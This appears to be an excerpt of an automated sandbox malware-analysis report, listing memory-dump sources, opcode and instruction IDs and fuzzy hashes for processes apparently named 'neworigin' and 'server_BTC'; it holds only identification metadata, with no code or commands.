                                                                                                                  • Opcode Fuzzy Hash: a4a05b8ab2f5207d710c1572b535ca9d4e49f358af3f31aa381e550af375dbf4
                                                                                                                  • Instruction Fuzzy Hash: 6A715B70A102099FDB54EFA9C980E9DBBF6FF84300F218469E855AB255DB30ED42CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7a87cfc758313149b1656c4c6dd7720600f9a7f7bcadbd7de2ef546435044999
                                                                                                                  • Instruction ID: 9e48f7ac980fd57d4bc7c7600e56b19db55e2ecccb181b01df66750e31ef4e7e
                                                                                                                  • Opcode Fuzzy Hash: 7a87cfc758313149b1656c4c6dd7720600f9a7f7bcadbd7de2ef546435044999
                                                                                                                  • Instruction Fuzzy Hash: 7C715A70A102099FDB54DFA9C990EADBBF6FF88300F258469E855EB255DB30ED42CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: db0ca3de13045b25eea39526fca02e140a1298f7a1cd3de4c5325da1a4053e49
                                                                                                                  • Instruction ID: e7c1e7e699e6ddf012413468acde0c0774be80222928fad72947d4e5d91e938f
                                                                                                                  • Opcode Fuzzy Hash: db0ca3de13045b25eea39526fca02e140a1298f7a1cd3de4c5325da1a4053e49
                                                                                                                  • Instruction Fuzzy Hash: 7051C874B342168BEF64967CD954B6F2A9AD78D350F20442ADD0AC73D5CA78CC918393
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b57e112f864c7155eaf8b0ad8c4be41218362d92d155b07345a50dfb8c9ef9bb
                                                                                                                  • Instruction ID: 12a11ea4952111827e4c5a1e03af3a540faf901d3af370fb54659c2f78273cce
                                                                                                                  • Opcode Fuzzy Hash: b57e112f864c7155eaf8b0ad8c4be41218362d92d155b07345a50dfb8c9ef9bb
                                                                                                                  • Instruction Fuzzy Hash: E851E974B342068BFF64A6ACD954B2F369AD78D750F204429ED0AC73D8CA78CC914393
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 06faabdbd4cbbb5cbe05bdd94a70b36edd7d6aaeb7ce0d8dca2ad2ee07613f43
                                                                                                                  • Instruction ID: 15275c8bfab815685107fbfb4540e93ce3f572be0d7386e6842da838c6f4f4cf
                                                                                                                  • Opcode Fuzzy Hash: 06faabdbd4cbbb5cbe05bdd94a70b36edd7d6aaeb7ce0d8dca2ad2ee07613f43
                                                                                                                  • Instruction Fuzzy Hash: 15417071E1060A8FDF60CE99D8C0EAFFBF2EB94310F10492AE516E7650D734E9558B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 88c840a11c34b2dd60c024725c024dfc7404f71d04928d808ec8c91f069a78c3
                                                                                                                  • Instruction ID: 528b757fa284e58d1834837deff6d482c19020f656742e4c6344d5b83a0870a2
                                                                                                                  • Opcode Fuzzy Hash: 88c840a11c34b2dd60c024725c024dfc7404f71d04928d808ec8c91f069a78c3
                                                                                                                  • Instruction Fuzzy Hash: 7E315030E10606DBCB59DFA4D854A9EB7B2FF89300F108529E906EB350DB71DD86CB51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7a4c5d44b335ac9b776386279a3b56ea8791d62db72e86db7cfb4e08b987f38b
                                                                                                                  • Instruction ID: 543a189ed9f8447d1c6ba090d9b6661aa16758a09602455742372d94ee8eb78d
                                                                                                                  • Opcode Fuzzy Hash: 7a4c5d44b335ac9b776386279a3b56ea8791d62db72e86db7cfb4e08b987f38b
                                                                                                                  • Instruction Fuzzy Hash: 7A315030E1060ADBCB59CFA4D854A9EB7B6BF89300F10C529E906EB351DB71ED82CB51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8e60746d1c13ae0a7db95bd624e2c70efaadc1fc14501aa6caad0ed91d56995f
                                                                                                                  • Instruction ID: 99509305ab1b4fc4bfd2637ad7b4f0844e58b4e7b058e37c2edc89cd1a1121c3
                                                                                                                  • Opcode Fuzzy Hash: 8e60746d1c13ae0a7db95bd624e2c70efaadc1fc14501aa6caad0ed91d56995f
                                                                                                                  • Instruction Fuzzy Hash: 52219C75E112169FDB50DF68D880EEEBBF1AB88310F104029E905E7394D731D941DB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 254db7d1c9738ced62d26b0fa0cabff09488ec77ac2cf3b99e099707684fc0f9
                                                                                                                  • Instruction ID: 1be4b54209daea6d1c4fe164853cb107909825d44fc4c4b9b54e5a777841dab5
                                                                                                                  • Opcode Fuzzy Hash: 254db7d1c9738ced62d26b0fa0cabff09488ec77ac2cf3b99e099707684fc0f9
                                                                                                                  • Instruction Fuzzy Hash: ED219D75F212269FDB50DFA9D880AAEB7F1FB48310F108029E905E7394E731D901CB92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d21fbea190f4b4c8ae2fe68c386ad2f79accc101033162cd0f0107f20bf101fa
                                                                                                                  • Instruction ID: c7467d5e06c5a4329cc798c9c82aa22c0f0c74d971c02dda3bb8647cba108b58
                                                                                                                  • Opcode Fuzzy Hash: d21fbea190f4b4c8ae2fe68c386ad2f79accc101033162cd0f0107f20bf101fa
                                                                                                                  • Instruction Fuzzy Hash: 9401D235B101211BDB21957D9811FAFA7DACBCA310F24843AF50ECB351D975DC4643A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 801a94df2e2231cb345f691c25b5b5d072a597b5afe420f9d32aae75eed38e13
                                                                                                                  • Instruction ID: 16e8b0cd898bec221cf9f4c281fd1997e9e2fdd48466b215a502e40b9ba281c4
                                                                                                                  • Opcode Fuzzy Hash: 801a94df2e2231cb345f691c25b5b5d072a597b5afe420f9d32aae75eed38e13
                                                                                                                  • Instruction Fuzzy Hash: 4D01B531B101111FCB6596BD9811F2B7BE6DBCA714F158879F90ACB250D935DD4243E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 422e364836dd53d064f8761106456e30a192cecc33d0c405fa1fe23d86b5e356
                                                                                                                  • Instruction ID: 32430429fce212063b662b06b8dcc497e3e098b6d393806b9140b3b18e322b7f
                                                                                                                  • Opcode Fuzzy Hash: 422e364836dd53d064f8761106456e30a192cecc33d0c405fa1fe23d86b5e356
                                                                                                                  • Instruction Fuzzy Hash: 5911A132B201294FDB94E678C814AAE73E6EBCC711F004139D80AEB348DE75DC029BD2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 44ae6888bbdd4d18d6484770b29a994885b5f0c5764acb59614405a71561b6fc
                                                                                                                  • Instruction ID: 77a21dbf2a2f84b343a4ce6ea45f06a46b406eb43f75e53de39ec885edc5ca65
                                                                                                                  • Opcode Fuzzy Hash: 44ae6888bbdd4d18d6484770b29a994885b5f0c5764acb59614405a71561b6fc
                                                                                                                  • Instruction Fuzzy Hash: 1021E0B5C11219AFCB10DF9AD885ACEFBB8FF48310F10812AE918A7200D374A954CFA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eb9869074bdaf11f2915e4dd621e16d187c974e4d9e480cb87f5ab1b5af40cab
                                                                                                                  • Instruction ID: 4b9b85ed957e57243363669659f9e4c93c2d4c3555254f11c41b8117f2c20e57
                                                                                                                  • Opcode Fuzzy Hash: eb9869074bdaf11f2915e4dd621e16d187c974e4d9e480cb87f5ab1b5af40cab
                                                                                                                  • Instruction Fuzzy Hash: 1F019E31B141110FCBA19A7CE865FAE6BE2EBC6320B104939E50AC7295DA26DD478791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7046dcebe5422a88d9ed9d0a2212a033234364464268f26b3a0873cf6285876f
                                                                                                                  • Instruction ID: 07c2cf0655e666fe1c7211b636511ce283a4aaf2951561567368d40f0c65eb19
                                                                                                                  • Opcode Fuzzy Hash: 7046dcebe5422a88d9ed9d0a2212a033234364464268f26b3a0873cf6285876f
                                                                                                                  • Instruction Fuzzy Hash: 6901D432B200295BDF94D67DEC15AEF77EB9BC8610F04403AD909E7288DE65CC0247E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bb233c785ec23f3190194136da55f5c722d067af20455481c588ce9331a7d246
                                                                                                                  • Instruction ID: aaa560550a7b80743a6dd836151ad2c2829c8662b95e5570dddc3f827435b4b6
                                                                                                                  • Opcode Fuzzy Hash: bb233c785ec23f3190194136da55f5c722d067af20455481c588ce9331a7d246
                                                                                                                  • Instruction Fuzzy Hash: F011DDB1D11219AFCB00DF9AD885ADEFBB8FB48310F10812AE918A7240C374A954CFA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ccacc9feac2093099b334e8dd8ed7b0feb56770f8a677397862895fb72bfcce1
                                                                                                                  • Instruction ID: c2ed21b5e14a7d5b35d13edb4d552e389c3ee73f4c736be540161e6179902bde
                                                                                                                  • Opcode Fuzzy Hash: ccacc9feac2093099b334e8dd8ed7b0feb56770f8a677397862895fb72bfcce1
                                                                                                                  • Instruction Fuzzy Hash: D901AD31B200220BDB64A5BDD414B6EA3DBDBCA711F30883AE90EC7354DDB5DC424395
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8714e5de631e64032bdf5238f5d1291c9b33bd8204ccd8bf5f2cab5ac671ec2f
                                                                                                                  • Instruction ID: 5ba71982790a03499e694d2a6ed0d0f4e583a8e71ec3f8ef153ee00852b6994a
                                                                                                                  • Opcode Fuzzy Hash: 8714e5de631e64032bdf5238f5d1291c9b33bd8204ccd8bf5f2cab5ac671ec2f
                                                                                                                  • Instruction Fuzzy Hash: 1C01DC31B200161BCB6596BEA450F2E63DBCBCA624F218839FA0ACB340DA75DC424392
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b673edb8de1fdd439fcab5d38ddb74bc86d30b8afe5c4d8121c61f619b34b072
                                                                                                                  • Instruction ID: 1a8c742cae018062e467f0cd02534aa9e2d975e0aea2530b430e1ea598349b91
                                                                                                                  • Opcode Fuzzy Hash: b673edb8de1fdd439fcab5d38ddb74bc86d30b8afe5c4d8121c61f619b34b072
                                                                                                                  • Instruction Fuzzy Hash: 23016D71B100110BDBA1AA6DD869F2E77D6EBC5720F108838E90AC7354DD32DC464381
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1e420cf0d9c996199b0446d11181a67e260d08d926e18b9488e73bcda6a161c4
                                                                                                                  • Instruction ID: 2ee2d946c88507bf52f068b4d16423f0682d1b75e9f55bb4fca5ff0327bfd66e
                                                                                                                  • Opcode Fuzzy Hash: 1e420cf0d9c996199b0446d11181a67e260d08d926e18b9488e73bcda6a161c4
                                                                                                                  • Instruction Fuzzy Hash: 63F0A032F31268ABDB649A76EC00EAAB379E785364F104429ED01E7248DB71AC05CBC0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1c94c15db60f3601acfe19b836edc3a288e31f3855af5f1a760e2c19c08495de
                                                                                                                  • Instruction ID: 275cf76571bb0ce9b994b227af692efad2ebe9d0d5e574d4f193ef50306b651a
                                                                                                                  • Opcode Fuzzy Hash: 1c94c15db60f3601acfe19b836edc3a288e31f3855af5f1a760e2c19c08495de
                                                                                                                  • Instruction Fuzzy Hash: 4DE0D875D252497BDF50CA70ED0AFDA7BBDDB42214F1048E9E804CB143E176D941D392
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-2843079600
                                                                                                                  • Opcode ID: 4f7a18c0aafeb28c4c6481fb54c63b293e55dcd56b345fd6eade39fc1231f46b
                                                                                                                  • Instruction ID: 145ad5d6e03e0880e90b9bb71645000420afad186e0a3269024a35e09af6d65b
                                                                                                                  • Opcode Fuzzy Hash: 4f7a18c0aafeb28c4c6481fb54c63b293e55dcd56b345fd6eade39fc1231f46b
                                                                                                                  • Instruction Fuzzy Hash: 72123030E1121ACFDB68DF69C854AADB7F2BF89304F208569D809AB355DB709D85CF81
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-1273862796
                                                                                                                  • Opcode ID: 6d4fb9e37a7d72bc3f4c9838bbddfbd3391634790f108be0eb8f07da6e47e3b9
                                                                                                                  • Instruction ID: 48d97b24b6a6515ae3ff34da280b7372612d578663daab5cd4b1f2fe72a4eea9
                                                                                                                  • Opcode Fuzzy Hash: 6d4fb9e37a7d72bc3f4c9838bbddfbd3391634790f108be0eb8f07da6e47e3b9
                                                                                                                  • Instruction Fuzzy Hash: 17917170A2020ADFDB68DFA5D995F6EB7F2BF84311F208529EC0197294DB749D41CB90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-981061697
                                                                                                                  • Opcode ID: deb95c73bd08cb75d9282ae16cea843b7b6c2844e898fe519973e2f41703ef9e
                                                                                                                  • Instruction ID: 4b764302054e8c81c3f0f7657f62c1bae26bda3e3e02c254b693fb5775e08298
                                                                                                                  • Opcode Fuzzy Hash: deb95c73bd08cb75d9282ae16cea843b7b6c2844e898fe519973e2f41703ef9e
                                                                                                                  • Instruction Fuzzy Hash: 9CF13C34B10246CFDB59EFA9C494A6EB7B2BFC4300F208569D8159B359DB71EC82CB91
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-858218434
                                                                                                                  • Opcode ID: b842d0681e8f3da00d93b58e5d92e93d0dd2600914b7a983f1c2d0124378452f
                                                                                                                  • Instruction ID: 0cc12940b7d70ae1fc5825d6d3e6f59992ccccff3b20c87cb85c92f76d4fbcec
                                                                                                                  • Opcode Fuzzy Hash: b842d0681e8f3da00d93b58e5d92e93d0dd2600914b7a983f1c2d0124378452f
                                                                                                                  • Instruction Fuzzy Hash: 63B11D30A20209CFDB64DFA9D494B6EB7B2AF84304F258939D8069B355DB75DC82CB81
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LR]q$LR]q$$]q$$]q
                                                                                                                  • API String ID: 0-3527005858
                                                                                                                  • Opcode ID: ae913d8d4a90d4c7a1233844d36e85fdd06ef01ca155f20461e668b3f8b97698
                                                                                                                  • Instruction ID: f6a72ac7bb9ab8a4bca6a9acca64a712aaef14862587859cf71ef048fa81225b
                                                                                                                  • Opcode Fuzzy Hash: ae913d8d4a90d4c7a1233844d36e85fdd06ef01ca155f20461e668b3f8b97698
                                                                                                                  • Instruction Fuzzy Hash: E55192307202069FDB58EB68C894E6A77E2FF85304F148969E8069B399DB75EC41CB51
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-858218434
                                                                                                                  • Opcode ID: 3fce09534bc74c8ee66998fc3c8c8dd3f59acef91ea57d44b71703ba51116eb3
                                                                                                                  • Instruction ID: d773d96f9df237046ac00844bc11e59b1b8105df89972cec48295dacf6945860
                                                                                                                  • Opcode Fuzzy Hash: 3fce09534bc74c8ee66998fc3c8c8dd3f59acef91ea57d44b71703ba51116eb3
                                                                                                                  • Instruction Fuzzy Hash: 88518070A202069BDF65DB68D480EAEB7B2EB85320F208529EC15D7355DB31DC82CB92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 90bcf7b3aa41ab54a700670ca593bb59ed323300e95e9cdfc89b89e18c9819c8
                                                                                                                  • Instruction ID: 736e7b21a37be0bc4beae1e2d100e58e5a853408186590507dd26be0cd2c9431
                                                                                                                  • Opcode Fuzzy Hash: 90bcf7b3aa41ab54a700670ca593bb59ed323300e95e9cdfc89b89e18c9819c8
                                                                                                                  • Instruction Fuzzy Hash: F171F678A402488FCB45DFA8D49499DBBB2FF49314F1191A9E806EB3A5DB30AC06CF11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4902ad32fbf9d1108eab2cf7990d5aeacc23c86cd2f0b84bf87d625e7cdf4329
                                                                                                                  • Instruction ID: b2b5265dedd1af02439929bf000df704af703717aca59ed78421f4801976f0aa
                                                                                                                  • Opcode Fuzzy Hash: 4902ad32fbf9d1108eab2cf7990d5aeacc23c86cd2f0b84bf87d625e7cdf4329
                                                                                                                  • Instruction Fuzzy Hash: 2D71E378D012198FCB15EFA4D894AEDBBB2FF89300F208569D449BB394DB345986CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 20ba6c07976720c34a034f432cdf4e7d4719ece3d2d2b3265539698dc8ca9c42
                                                                                                                  • Instruction ID: 9649a1a7887e3a038fe83946e3e9b635d41aa7333e5db34c64532ea650ef2e2c
                                                                                                                  • Opcode Fuzzy Hash: 20ba6c07976720c34a034f432cdf4e7d4719ece3d2d2b3265539698dc8ca9c42
                                                                                                                  • Instruction Fuzzy Hash: 8C41CCB9D002489FDB11DFAAC984ADEFBB6AF88304F14802AE419AB354D7749946CF44
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d230421ef43dc3797f9e5837d5383b9f85d4c7061c2c024b4015c00d913871e1
                                                                                                                  • Instruction ID: b5e0e85c115c4dbffa5d481b9c82089a0a2ccb33e7dc11f70440c402382336f2
                                                                                                                  • Opcode Fuzzy Hash: d230421ef43dc3797f9e5837d5383b9f85d4c7061c2c024b4015c00d913871e1
                                                                                                                  • Instruction Fuzzy Hash: 7E41CCB9D0024C9FDB10DFAAC984ADEFBB6AF88304F14802AE419AB354D774A945CF54
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_10_2_28b0000_server_BTC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Jdq
                                                                                                                  • API String ID: 0-1891755625
                                                                                                                  • Opcode ID: 575fb060f02a046e46bf2d6215b3d0f58f62c241e751d100df9f29df31a2ca4f
                                                                                                                  • Instruction ID: a0306d5f7b161bc360842ee7e2ff308c7dfbbedd4f52778df1ada254a7127864
                                                                                                                  • Opcode Fuzzy Hash: 575fb060f02a046e46bf2d6215b3d0f58f62c241e751d100df9f29df31a2ca4f
                                                                                                                  • Instruction Fuzzy Hash: 5841F578E412189FDB08DFA9D494AEEBBB2FF89301F108469E415B73A0DB349905CF91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000A.00000002.2215808755.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
